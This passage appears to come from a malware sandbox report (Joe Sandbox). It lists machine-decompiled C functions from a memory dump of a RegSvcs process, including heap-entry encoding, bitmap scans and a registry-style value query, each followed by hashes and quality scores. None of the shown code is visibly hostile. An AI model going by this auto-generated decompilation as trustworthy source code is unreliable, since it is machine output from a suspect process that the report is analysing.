                                          								__eflags = _t210;
                                          							}
                                          						}
                                          					} else {
                                          						_t204 = _t204 + _t185;
                                          						_t210 = _t210 - _t185;
                                          					}
                                          				}
                                          				if(_t210 << 3 < _t187) {
                                          					_t204 = _t204 + _t210;
                                          				}
                                          				_t74 =  *0x13e6110; // 0x7900493f
                                          				asm("sbb edx, edx");
                                          				_t189 =  !_t187 & _t210;
                                          				_t211 = _v24;
                                          				_v20 = _t189;
                                          				 *_t133 = ( !_t74 ^  *_t133 ^ _t133) & 0x7fffffff ^  !_t74 ^ _t133;
                                          				_t152 = _t133 - _t211;
                                          				_t77 = _t133 - _t211 >> 0xc;
                                          				_v28 = _t77;
                                          				_t80 = (_t77 ^  *0x13e6110 ^ _t133) & 0x000000ff;
                                          				_v32 = _t80;
                                          				 *(_t133 + 4) = _t80;
                                          				_t82 = _t204 << 3;
                                          				if(_t189 != 0) {
                                          					_t82 = _t82 + 0x10;
                                          				}
                                          				_t190 = _t189 | 0xffffffff;
                                          				_t154 = 0x3f;
                                          				_v12 = E0133D340(_t82 + _t152 - 0x00000001 >> 0x0000000c | 0xffffffff, _t154 - (_t82 + _t152 - 1 >> 0xc), _t190);
                                          				_v8 = _t190;
                                          				_t191 = _t190 | 0xffffffff;
                                          				_v12 = _v12 & E0133D0F0(_t86 | 0xffffffff, _v28, _t191);
                                          				_v8 = _v8 & _t191;
                                          				_t193 = _v12 & ( *(_t211 + 8) ^ _v12);
                                          				_t212 = _v20;
                                          				_t160 = _v8 & ( *(_t211 + 0xc) ^ _v8);
                                          				_v12 = _t193;
                                          				_v8 = _t160;
                                          				if((_t193 | _t160) != 0) {
                                          					 *(_t133 + 4) = _v32 | 0x00000200;
                                          					_t117 = _a12 & 0x00000001;
                                          					_v32 = _t117;
                                          					if(_t117 == 0) {
                                          						E0130FFB0(_t133, _t204, _v16);
                                          						_t193 = _v12;
                                          					}
                                          					_t212 = _v20;
                                          					_t200 =  !_v8;
                                          					_t121 = _t200 & 0x000000ff;
                                          					_t201 = _t200 >> 8;
                                          					_t44 = _t121 + 0x12dac00; // 0x6070708
                                          					_t122 = _t201 & 0x000000ff;
                                          					_t202 = _t201 >> 8;
                                          					_t175 = _t202 >> 8;
                                          					_t45 = _t122 + 0x12dac00; // 0x6070708
                                          					_t123 = _t202 & 0x000000ff;
                                          					_t47 = _t175 + 0x12dac00; // 0x6060706
                                          					_t48 = _t123 + 0x12dac00; // 0x6070708
                                          					_t142 = _v16;
                                          					if(E013C2FBD(_v16, _v24, _v12, _v8, ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff) + ( *_t44 +  *_t45 +  *_t47 +  *_t48 & 0x000000ff), 1) < 0) {
                                          						_t212 = _t212 + _t204;
                                          						_t204 = 0;
                                          					}
                                          					if(_v32 == 0) {
                                          						E01312280(_t125, _t142);
                                          					}
                                          					_t133 = _a4;
                                          					 *_a16 = 0xff;
                                          					 *(_t133 + 4) =  *(_t133 + 4) & 0xfffffdff;
                                          				}
                                          				 *_t133 =  *_t133 ^ (_t204 + _t204 ^  *_t133 ^  *0x13e6110 ^ _t133) & 0x0000fffe;
                                          				if(_t212 != 0) {
                                          					_t194 = _t133 + _t204 * 8;
                                          					_t134 =  *0x13e6110; // 0x7900493f
                                          					if(_t204 == 0) {
                                          						_t102 = ( *_t194 ^ _t134 ^ _t194) & 0x7fff0000;
                                          						__eflags = _t102;
                                          					} else {
                                          						_t102 = _t204 << 0x10;
                                          					}
                                          					_t135 = _v24;
                                          					 *_t194 = ((_t212 & 0x00007fff | 0xc0000000) + (_t212 & 0x00007fff | 0xc0000000) | _t102) ^ _t134 ^ _t194;
                                          					_t168 = _t194 + _t212 * 8;
                                          					 *(_t194 + 4) = (_t194 - _t135 >> 0x0000000c ^  *0x13e6110 ^ _t194) & 0x000000ff;
                                          					if(_t168 < _t135 + (( *(_t135 + 0x14) & 0x0000ffff) + 3) * 8) {
                                          						 *_t168 =  *_t168 ^ (_t212 << 0x00000010 ^  *_t168 ^  *0x13e6110 ^ _t168) & 0x7fff0000;
                                          					}
                                          					E013C241A(_v16, _t135, _t194, _a12, _a16);
                                          				}
                                          				return _t204;
                                          			}


                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: cdf0ed5b23e851dbe56685fd8fb1b1d5800ecf802c88c2cc637292e48ad20cc1
                                          • Instruction ID: e7710c2f0fee3db8d929b865217f17ee74baf56907fc1ced3ce6ae72acd5372d
                                          • Opcode Fuzzy Hash: cdf0ed5b23e851dbe56685fd8fb1b1d5800ecf802c88c2cc637292e48ad20cc1
                                          • Instruction Fuzzy Hash: 6A81F372A101158BCB19CF79C8916BEBBF1FF88324B1982ADD815EB2D6DA34D911CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 90%
                                          			E013C1D55(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                          				intOrPtr _t97;
                                          				signed int _t101;
                                          				signed int _t112;
                                          				unsigned int _t113;
                                          				signed int _t121;
                                          				signed int _t128;
                                          				signed int _t130;
                                          				signed char _t135;
                                          				intOrPtr _t136;
                                          				intOrPtr _t137;
                                          				signed int _t139;
                                          				signed int _t141;
                                          				signed int _t143;
                                          				signed int _t144;
                                          				signed int _t149;
                                          				signed int _t150;
                                          				void* _t154;
                                          				signed int* _t161;
                                          				signed int _t163;
                                          				signed int _t164;
                                          				void* _t167;
                                          				intOrPtr _t171;
                                          				signed int _t172;
                                          				void* _t175;
                                          				signed int* _t178;
                                          				signed int _t179;
                                          				signed int _t180;
                                          				signed char _t181;
                                          				signed char _t183;
                                          				signed int _t187;
                                          				signed int _t189;
                                          				signed int _t190;
                                          				void* _t191;
                                          				void* _t197;
                                          
                                          				_t137 = __ecx;
                                          				_push(0x64);
                                          				_push(0x13d1070);
                                          				E0134D08C(__ebx, __edi, __esi);
                                          				 *(_t191 - 0x24) = __edx;
                                          				 *((intOrPtr*)(_t191 - 0x20)) = __ecx;
                                          				 *((intOrPtr*)(_t191 - 0x38)) = __ecx;
                                          				_t135 = 0;
                                          				 *(_t191 - 0x40) = 0;
                                          				_t171 =  *((intOrPtr*)(__ecx + 0xc));
                                          				_t189 =  *(__ecx + 8);
                                          				 *(_t191 - 0x28) = _t189;
                                          				 *((intOrPtr*)(_t191 - 0x3c)) = _t171;
                                          				 *(_t191 - 0x50) = _t189;
                                          				_t187 = __edx << 0xf;
                                          				 *(_t191 - 0x4c) = _t187;
                                          				_t190 = 0x8000;
                                          				 *(_t191 - 0x34) = 0x8000;
                                          				_t172 = _t171 - _t187;
                                          				if(_t172 <= 0x8000) {
                                          					_t190 = _t172;
                                          					 *(_t191 - 0x34) = _t172;
                                          				}
                                          				 *(_t191 - 0x68) = _t135;
                                          				 *(_t191 - 0x64) = _t135;
                                          				L3:
                                          				while(1) {
                                          					if( *(_t191 + 8) != 0) {
                                          						L22:
                                          						 *(_t191 + 8) = _t135;
                                          						E013C337F(_t137, 1, _t191 - 0x74);
                                          						_t97 =  *((intOrPtr*)(_t191 - 0x20));
                                          						_t175 =  *(_t97 + 0x14);
                                          						 *(_t191 - 0x58) = _t175;
                                          						_t139 = _t97 + 0x14;
                                          						 *(_t191 - 0x44) = _t139;
                                          						_t197 = _t175 - 0xffffffff;
                                          						if(_t197 == 0) {
                                          							 *_t139 =  *(_t191 - 0x24);
                                          							E013C33B6(_t191 - 0x74);
                                          							 *(_t191 - 0x40) = 1;
                                          							_t60 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
                                          							_t101 =  *_t60;
                                          							_t141 =  *(_t191 - 0x24);
                                          							asm("bt [eax], ecx");
                                          							_t103 = (_t101 & 0xffffff00 | __eflags > 0x00000000) & 0x000000ff;
                                          							if(__eflags == 0) {
                                          								goto L41;
                                          							} else {
                                          								_t103 = _t187 - 1 + _t190;
                                          								__eflags = _t187 - 1 + _t190 -  *((intOrPtr*)(_t191 - 0x3c));
                                          								if(_t187 - 1 + _t190 >=  *((intOrPtr*)(_t191 - 0x3c))) {
                                          									goto L41;
                                          								} else {
                                          									__eflags = _t190 - 1;
                                          									if(__eflags > 0) {
                                          										_t143 =  *(_t191 - 0x28);
                                          										_t178 = _t143 + (_t187 >> 5) * 4;
                                          										_t144 = _t143 + (_t187 - 1 + _t190 >> 5) * 4;
                                          										 *(_t191 - 0x50) = _t144;
                                          										_t112 =  *_t178;
                                          										 *(_t191 - 0x54) = _t112;
                                          										_t113 = _t112 | 0xffffffff;
                                          										__eflags = _t178 - _t144;
                                          										if(_t178 != _t144) {
                                          											_t103 = _t113 << _t187;
                                          											__eflags =  *_t178 & _t103;
                                          											if(( *_t178 & _t103) != 0) {
                                          												goto L41;
                                          											} else {
                                          												_t103 =  *(_t191 - 0x50);
                                          												while(1) {
                                          													_t178 =  &(_t178[1]);
                                          													__eflags = _t178 - _t103;
                                          													if(_t178 == _t103) {
                                          														break;
                                          													}
                                          													__eflags =  *_t178 - _t135;
                                          													if( *_t178 != _t135) {
                                          														goto L41;
                                          													} else {
                                          														continue;
                                          													}
                                          													goto L42;
                                          												}
                                          												_t103 = (_t103 | 0xffffffff) >>  !(_t187 - 1 + _t190);
                                          												__eflags = _t103;
                                          												_t149 =  *_t178;
                                          												goto L38;
                                          											}
                                          										} else {
                                          											_t154 = 0x20;
                                          											_t103 = _t113 >> _t154 - _t190 << _t187;
                                          											_t149 =  *(_t191 - 0x54);
                                          											L38:
                                          											_t150 = _t149 & _t103;
                                          											__eflags = _t150;
                                          											asm("sbb cl, cl");
                                          											_t135 =  ~_t150 + 1;
                                          											_t141 =  *(_t191 - 0x24);
                                          											goto L39;
                                          										}
                                          									} else {
                                          										if(__eflags != 0) {
                                          											goto L41;
                                          										} else {
                                          											_t103 =  *(_t191 - 0x28);
                                          											asm("bt [eax], edi");
                                          											if(__eflags >= 0) {
                                          												L40:
                                          												_t136 =  *((intOrPtr*)(_t191 - 0x20));
                                          												asm("lock btr [eax], ecx");
                                          												 *((intOrPtr*)(_t191 - 0x60)) = (_t141 << 0xc) +  *((intOrPtr*)(_t136 + 8));
                                          												 *((intOrPtr*)(_t191 - 0x5c)) = 0x1000;
                                          												_push(0x4000);
                                          												_push(_t191 - 0x5c);
                                          												_push(_t191 - 0x60);
                                          												_push(0xffffffff);
                                          												_t103 = E013396E0();
                                          											} else {
                                          												L39:
                                          												__eflags = _t135;
                                          												if(_t135 == 0) {
                                          													goto L41;
                                          												} else {
                                          													goto L40;
                                          												}
                                          											}
                                          										}
                                          									}
                                          								}
                                          							}
                                          						} else {
                                          							E013C33B6(_t191 - 0x74);
                                          							_t172 = _t191 - 0x58;
                                          							E0132E18B( *(_t191 - 0x44), _t172, 4, _t135,  *0x13e5880);
                                          							_t51 =  *((intOrPtr*)(_t191 - 0x38)) + 4; // 0x40c03332
                                          							_t121 =  *_t51;
                                          							asm("bt [eax], ecx");
                                          							_t103 = (_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff;
                                          							if(((_t121 & 0xffffff00 | _t197 > 0x00000000) & 0x000000ff) == 0) {
                                          								goto L41;
                                          							} else {
                                          								_t137 =  *((intOrPtr*)(_t191 - 0x20));
                                          								continue;
                                          							}
                                          						}
                                          					} else {
                                          						 *(_t191 - 4) = _t135;
                                          						_t103 = _t187 - 1 + _t190;
                                          						 *(_t191 - 0x30) = _t103;
                                          						if(_t103 <  *((intOrPtr*)(_t191 - 0x3c))) {
                                          							__eflags = _t190 - 1;
                                          							if(__eflags > 0) {
                                          								_t179 =  *(_t191 - 0x28);
                                          								_t161 = _t179 + (_t187 >> 5) * 4;
                                          								 *(_t191 - 0x2c) = _t161;
                                          								_t128 = _t179 + ( *(_t191 - 0x30) >> 5) * 4;
                                          								 *(_t191 - 0x44) = _t128;
                                          								_t180 =  *_t161;
                                          								__eflags = _t161 - _t128;
                                          								if(_t161 != _t128) {
                                          									_t103 = (_t128 | 0xffffffff) << _t187;
                                          									__eflags = _t103 & _t180;
                                          									if((_t103 & _t180) != 0) {
                                          										goto L5;
                                          									} else {
                                          										_t130 =  *(_t191 - 0x2c);
                                          										_t164 =  *(_t191 - 0x44);
                                          										while(1) {
                                          											_t130 = _t130 + 4;
                                          											 *(_t191 - 0x2c) = _t130;
                                          											_t180 =  *_t130;
                                          											__eflags = _t130 - _t164;
                                          											if(_t130 == _t164) {
                                          												break;
                                          											}
                                          											__eflags = _t180;
                                          											if(_t180 == 0) {
                                          												continue;
                                          											} else {
                                          												goto L5;
                                          											}
                                          											goto L19;
                                          										}
                                          										_t103 = (_t130 | 0xffffffff) >>  !( *(_t191 - 0x30));
                                          										__eflags = _t103;
                                          										goto L17;
                                          									}
                                          								} else {
                                          									_t167 = 0x20;
                                          									_t103 = (_t128 | 0xffffffff) >> _t167 - _t190 << _t187;
                                          									L17:
                                          									_t183 =  ~(_t180 & _t103);
                                          									asm("sbb dl, dl");
                                          									goto L18;
                                          								}
                                          							} else {
                                          								if(__eflags != 0) {
                                          									goto L5;
                                          								} else {
                                          									_t103 =  *(_t191 - 0x28);
                                          									asm("bt [eax], edi");
                                          									_t183 =  ~(_t172 & 0xffffff00 | __eflags > 0x00000000);
                                          									asm("sbb dl, dl");
                                          									L18:
                                          									_t181 = _t183 + 1;
                                          									__eflags = _t181;
                                          								}
                                          							}
                                          						} else {
                                          							L5:
                                          							_t181 = _t135;
                                          						}
                                          						L19:
                                          						 *(_t191 - 0x19) = _t181;
                                          						_t163 = _t181 & 0x000000ff;
                                          						 *(_t191 - 0x48) = _t163;
                                          						 *(_t191 - 4) = 0xfffffffe;
                                          						if(_t163 == 0) {
                                          							L41:
                                          							_t136 =  *((intOrPtr*)(_t191 - 0x20));
                                          						} else {
                                          							_t137 =  *((intOrPtr*)(_t191 - 0x20));
                                          							goto L22;
                                          						}
                                          					}
                                          					L42:
                                          					__eflags =  *(_t191 - 0x40);
                                          					if( *(_t191 - 0x40) != 0) {
                                          						_t91 = _t136 + 0x14; // 0x14
                                          						_t142 = _t91;
                                          						 *_t91 = 0xffffffff;
                                          						__eflags = 0;
                                          						asm("lock or [eax], edx");
                                          						_t103 = E0132DFDF(_t91, 1, _t142);
                                          					}
                                          					return E0134D0D1(_t103);
                                          				}
                                          			}

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: e6b24c0cccd9bf09a85a9ae5f738efce945a102b1760b42d8329b8bb582348cf
                                          • Instruction ID: 3e4645a40c6813e63962c30354ac50f60cd798b620ce5e1ab5fc0ee00c92579a
                                          • Opcode Fuzzy Hash: e6b24c0cccd9bf09a85a9ae5f738efce945a102b1760b42d8329b8bb582348cf
                                          • Instruction Fuzzy Hash: A2814931E0021ACBDB18DFA8C8909ECBBB1BF59718B14436DE416AB386DB319D49DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 67%
                                          			E012FC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                                          				signed int _v8;
                                          				char _v1036;
                                          				signed int _v1040;
                                          				char _v1048;
                                          				signed int _v1052;
                                          				signed char _v1056;
                                          				void* _v1058;
                                          				char _v1060;
                                          				signed int _v1064;
                                          				void* _v1068;
                                          				intOrPtr _v1072;
                                          				void* _v1084;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				intOrPtr _t70;
                                          				intOrPtr _t72;
                                          				signed int _t74;
                                          				intOrPtr _t77;
                                          				signed int _t78;
                                          				signed int _t81;
                                          				void* _t101;
                                          				signed int _t102;
                                          				signed int _t107;
                                          				signed int _t109;
                                          				signed int _t110;
                                          				signed char _t111;
                                          				signed int _t112;
                                          				signed int _t113;
                                          				signed int _t114;
                                          				intOrPtr _t116;
                                          				void* _t117;
                                          				char _t118;
                                          				void* _t120;
                                          				char _t121;
                                          				signed int _t122;
                                          				signed int _t123;
                                          				signed int _t125;
                                          
                                          				_t125 = (_t123 & 0xfffffff8) - 0x424;
                                          				_v8 =  *0x13ed360 ^ _t125;
                                          				_t116 = _a4;
                                          				_v1056 = _a16;
                                          				_v1040 = _a24;
                                          				if(E01306D30( &_v1048, _a8) < 0) {
                                          					L4:
                                          					_pop(_t117);
                                          					_pop(_t120);
                                          					_pop(_t101);
                                          					return E0133B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                                          				}
                                          				_t70 = _a20;
                                          				if(_t70 >= 0x3f4) {
                                          					_t121 = _t70 + 0xc;
                                          					L19:
                                          					_t107 =  *( *[fs:0x30] + 0x18);
                                          					__eflags = _t107;
                                          					if(_t107 == 0) {
                                          						L60:
                                          						_t68 = 0xc0000017;
                                          						goto L4;
                                          					}
                                          					_t72 =  *0x13e7b9c; // 0x0
                                          					_t74 = L01314620(_t107, _t107, _t72 + 0x180000, _t121);
                                          					_v1064 = _t74;
                                          					__eflags = _t74;
                                          					if(_t74 == 0) {
                                          						goto L60;
                                          					}
                                          					_t102 = _t74;
                                          					_push( &_v1060);
                                          					_push(_t121);
                                          					_push(_t74);
                                          					_push(2);
                                          					_push( &_v1048);
                                          					_push(_t116);
                                          					_t122 = E01339650();
                                          					__eflags = _t122;
                                          					if(_t122 >= 0) {
                                          						L7:
                                          						_t114 = _a12;
                                          						__eflags = _t114;
                                          						if(_t114 != 0) {
                                          							_t77 = _a20;
                                          							L26:
                                          							_t109 =  *(_t102 + 4);
                                          							__eflags = _t109 - 3;
                                          							if(_t109 == 3) {
                                          								L55:
                                          								__eflags = _t114 - _t109;
                                          								if(_t114 != _t109) {
                                          									L59:
                                          									_t122 = 0xc0000024;
                                          									L15:
                                          									_t78 = _v1052;
                                          									__eflags = _t78;
                                          									if(_t78 != 0) {
                                          										L013177F0( *( *[fs:0x30] + 0x18), 0, _t78);
                                          									}
                                          									_t68 = _t122;
                                          									goto L4;
                                          								}
                                          								_t110 = _v1056;
                                          								_t118 =  *((intOrPtr*)(_t102 + 8));
                                          								_v1060 = _t118;
                                          								__eflags = _t110;
                                          								if(_t110 == 0) {
                                          									L10:
                                          									_t122 = 0x80000005;
                                          									L11:
                                          									_t81 = _v1040;
                                          									__eflags = _t81;
                                          									if(_t81 == 0) {
                                          										goto L15;
                                          									}
                                          									__eflags = _t122;
                                          									if(_t122 >= 0) {
                                          										L14:
                                          										 *_t81 = _t118;
                                          										goto L15;
                                          									}
                                          									__eflags = _t122 - 0x80000005;
                                          									if(_t122 != 0x80000005) {
                                          										goto L15;
                                          									}
                                          									goto L14;
                                          								}
                                          								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
                                          								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
                                          									goto L10;
                                          								}
                                          								_push( *((intOrPtr*)(_t102 + 8)));
                                          								_t59 = _t102 + 0xc; // 0xc
                                          								_push(_t110);
                                          								L54:
                                          								E0133F3E0();
                                          								_t125 = _t125 + 0xc;
                                          								goto L11;
                                          							}
                                          							__eflags = _t109 - 7;
                                          							if(_t109 == 7) {
                                          								goto L55;
                                          							}
                                          							_t118 = 4;
                                          							__eflags = _t109 - _t118;
                                          							if(_t109 != _t118) {
                                          								__eflags = _t109 - 0xb;
                                          								if(_t109 != 0xb) {
                                          									__eflags = _t109 - 1;
                                          									if(_t109 == 1) {
                                          										__eflags = _t114 - _t118;
                                          										if(_t114 != _t118) {
                                          											_t118 =  *((intOrPtr*)(_t102 + 8));
                                          											_v1060 = _t118;
                                          											__eflags = _t118 - _t77;
                                          											if(_t118 > _t77) {
                                          												goto L10;
                                          											}
                                          											_push(_t118);
                                          											_t56 = _t102 + 0xc; // 0xc
                                          											_push(_v1056);
                                          											goto L54;
                                          										}
                                          										__eflags = _t77 - _t118;
                                          										if(_t77 != _t118) {
                                          											L34:
                                          											_t122 = 0xc0000004;
                                          											goto L15;
                                          										}
                                          										_t111 = _v1056;
                                          										__eflags = _t111 & 0x00000003;
                                          										if((_t111 & 0x00000003) == 0) {
                                          											_v1060 = _t118;
                                          											__eflags = _t111;
                                          											if(__eflags == 0) {
                                          												goto L10;
                                          											}
                                          											_t42 = _t102 + 0xc; // 0xc
                                          											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
                                          											_v1048 =  *((intOrPtr*)(_t102 + 8));
                                          											_push(_t111);
                                          											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
                                          											_push(0);
                                          											_push( &_v1048);
                                          											_t122 = E013313C0(_t102, _t118, _t122, __eflags);
                                          											L44:
                                          											_t118 = _v1072;
                                          											goto L11;
                                          										}
                                          										_t122 = 0x80000002;
                                          										goto L15;
                                          									}
                                          									_t122 = 0xc0000024;
                                          									goto L44;
                                          								}
                                          								__eflags = _t114 - _t109;
                                          								if(_t114 != _t109) {
                                          									goto L59;
                                          								}
                                          								_t118 = 8;
                                          								__eflags = _t77 - _t118;
                                          								if(_t77 != _t118) {
                                          									goto L34;
                                          								}
                                          								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                          								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                          									goto L34;
                                          								}
                                          								_t112 = _v1056;
                                          								_v1060 = _t118;
                                          								__eflags = _t112;
                                          								if(_t112 == 0) {
                                          									goto L10;
                                          								}
                                          								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
                                          								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
                                          								goto L11;
                                          							}
                                          							__eflags = _t114 - _t118;
                                          							if(_t114 != _t118) {
                                          								goto L59;
                                          							}
                                          							__eflags = _t77 - _t118;
                                          							if(_t77 != _t118) {
                                          								goto L34;
                                          							}
                                          							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
                                          							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
                                          								goto L34;
                                          							}
                                          							_t113 = _v1056;
                                          							_v1060 = _t118;
                                          							__eflags = _t113;
                                          							if(_t113 == 0) {
                                          								goto L10;
                                          							}
                                          							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
                                          							goto L11;
                                          						}
                                          						_t118 =  *((intOrPtr*)(_t102 + 8));
                                          						__eflags = _t118 - _a20;
                                          						if(_t118 <= _a20) {
                                          							_t114 =  *(_t102 + 4);
                                          							_t77 = _t118;
                                          							goto L26;
                                          						}
                                          						_v1060 = _t118;
                                          						goto L10;
                                          					}
                                          					__eflags = _t122 - 0x80000005;
                                          					if(_t122 != 0x80000005) {
                                          						goto L15;
                                          					}
                                          					L013177F0( *( *[fs:0x30] + 0x18), 0, _t102);
                                          					L18:
                                          					_t121 = _v1060;
                                          					goto L19;
                                          				}
                                          				_push( &_v1060);
                                          				_push(0x400);
                                          				_t102 =  &_v1036;
                                          				_push(_t102);
                                          				_push(2);
                                          				_push( &_v1048);
                                          				_push(_t116);
                                          				_t122 = E01339650();
                                          				if(_t122 >= 0) {
                                          					__eflags = 0;
                                          					_v1052 = 0;
                                          					goto L7;
                                          				}
                                          				if(_t122 == 0x80000005) {
                                          					goto L18;
                                          				}
                                          				goto L4;
                                          			}











































                                          Memory Dump Source
                                          • Source File: 00000001.00000002.318452045.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: true
                                          • Associated: 00000001.00000002.320070409.00000000013EB000.00000040.00000800.00020000.00000000.sdmp
                                          • Associated: 00000001.00000002.320097320.00000000013EF000.00000040.00000800.00020000.00000000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_1_2_12d0000_RegSvcs.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9731e9d76d193a3dbd7b6a1ad52c838ea237b58b3c561130b8b2b093ec4bc969
                                          • Instruction ID: f858ced0325f5ce350a81ca2f09325c644e179017fd6f37aec503cf57eb71a5d
                                          • Opcode Fuzzy Hash: 9731e9d76d193a3dbd7b6a1ad52c838ea237b58b3c561130b8b2b093ec4bc969
                                          • Instruction Fuzzy Hash: EB8192756142068BDB26CE58C880E7E77ECEF8435CF54886AEE459B349D330DD41CB92
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 73%
                                          			E013B03DA(signed int* __ecx, intOrPtr __edx, intOrPtr _a4) {
                                          				signed int _v8;
                                          				signed int _v12;
                                          				intOrPtr* _v16;
                                          				signed int* _v20;
                                          				signed int _v24;
                                          				signed char _v28;
                                          				signed int _v32;
                                          				signed int* _v36;
                                          				void* __ebx;
                                          				void* __edi;
                                          				intOrPtr* _t80;
                                          				signed int _t87;
                                          				signed char _t90;
                                          				signed int _t107;
                                          				intOrPtr* _t119;
                                          				signed int _t120;
                                          				signed int _t121;
                                          				signed char _t127;
                                          				void* _t129;
                                          				intOrPtr* _t130;
                                          				signed int _t137;
                                          				signed int _t139;
                                          				signed int _t141;
                                          				signed int _t144;
                                          				signed char _t148;
                                          				signed int _t154;
                                          				signed char _t155;
                                          				signed int _t164;
                                          				unsigned int _t167;
                                          				signed int _t168;
                                          				signed int _t170;
                                          				unsigned int _t173;
                                          				signed int* _t174;
                                          				signed int _t175;
                                          				intOrPtr* _t177;
                                          				signed int _t178;
                                          				signed int _t179;
                                          				signed int _t180;
                                          				signed char _t183;
                                          				intOrPtr _t184;
                                          				unsigned int _t186;
                                          				unsigned int _t187;
                                          
                                          				_push( *0x13e634c);
                                          				_t119 = __ecx;
                                          				_t184 = __edx;
                                          				_push( *0x13e6348);
                                          				_v20 = __ecx;
                                          				_push(0);
                                          				_t129 = 0xc;
                                          				_t80 = E013BBBBB(_t129, _t129);
                                          				_t130 = _t80;
                                          				_v16 = _t130;
                                          				if(_t130 == 0) {
                                          					return _t80;
                                          				}
                                          				 *((intOrPtr*)(_t130 + 8)) = _a4;
                                          				_t82 =  &(__ecx[1]);
                                          				 *((intOrPtr*)(_t130 + 4)) = _t184;
                                          				_v36 =  &(__ecx[1]);
                                          				E01312280( &(__ecx[1]), _t82);
                                          				_v12 = 1;
                                          				 *_t119 =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          				_t120 = _t119 + 8;
                                          				_t175 =  *(_t120 + 4);
                                          				_t87 = _t175 >> 5;
                                          				if( *_t120 < _t87 + _t87) {
                                          					L22:
                                          					_t186 = _t175 >> 5;
                                          					_t177 = _v16;
                                          					_t90 = (_t87 | 0xffffffff) << (_t175 & 0x0000001f) &  *(_t177 + 4);
                                          					_v8 = _t90;
                                          					_t137 =  *(_t120 + 8);
                                          					_v8 = (_v8 >> 0x18) + ((_v8 >> 0x00000010 & 0x000000ff) + ((_t90 >> 0x00000008 & 0x000000ff) + ((_t90 & 0x000000ff) + 0xb15dcb) * 0x25) * 0x25) * 0x25;
                                          					_t67 = _t186 - 1; // 0xffffffdf
                                          					_t164 = _t67 & _v8;
                                          					 *_t177 =  *((intOrPtr*)(_t137 + _t164 * 4));
                                          					 *((intOrPtr*)(_t137 + _t164 * 4)) = _t177;
                                          					 *_t120 =  *_t120 + 1;
                                          					_t178 = 0;
                                          					L23:
                                          					 *_v20 =  *_v20 & 0x00000000;
                                          					E0130FFB0(_t120, _t178, _v36);
                                          					if(_t178 != 0) {
                                          						E013BBCD2(_t178,  *0x13e6348,  *0x13e634c);
                                          					}
                                          					return _v12;
                                          				}
                                          				_t139 = 2;
                                          				_t87 = E0132F3D5( &_v8, _t87 * _t139, _t87 * _t139 >> 0x20);
                                          				if(_t87 < 0) {
                                          					goto L22;
                                          				}
                                          				_t187 = _v8;
                                          				if(_t187 < 4) {
                                          					_t187 = 4;
                                          				}
                                          				_push(0);
                                          				_t87 = E013B0150(_t187 << 2);
                                          				_t179 = _t87;
                                          				_v8 = _t179;
                                          				if(_t179 == 0) {
                                          					_t175 =  *(_t120 + 4);
                                          					if(_t175 >= 0x20) {
                                          						goto L22;
                                          					}
                                          					_v12 = _v12 & 0x00000000;
                                          					_t178 = _v16;
                                          					goto L23;
                                          				} else {
                                          					_t19 = _t187 - 1; // 0x3
                                          					_t141 = _t19;
                                          					if((_t187 & _t141) == 0) {
                                          						L10:
                                          						if(_t187 > 0x4000000) {
                                          							_t187 = 0x4000000;
                                          						}
                                          						_v28 = _v28 & 0x00000000;
                                          						_t167 = _t187 << 2;
                                          						_t107 = _t120 | 0x00000001;
                                          						_v24 = _t179;
                                          						_t168 = _t167 >> 2;
                                          						asm("sbb ecx, ecx");
                                          						_t144 =  !(_t167 + _t179) & _t168;
                                          						if(_t144 <= 0) {
                                          							L15:
                                          							_t180 = 0;
                                          							_t170 = (_t168 | 0xffffffff) << ( *(_t120 + 4) & 0x0000001f);
                                          							_v24 = _t170;
                                          							if(( *(_t120 + 4) & 0xffffffe0) <= 0) {
                                          								L20:
                                          								_t147 =  *(_t120 + 8);
                                          								_t87 = _v8;
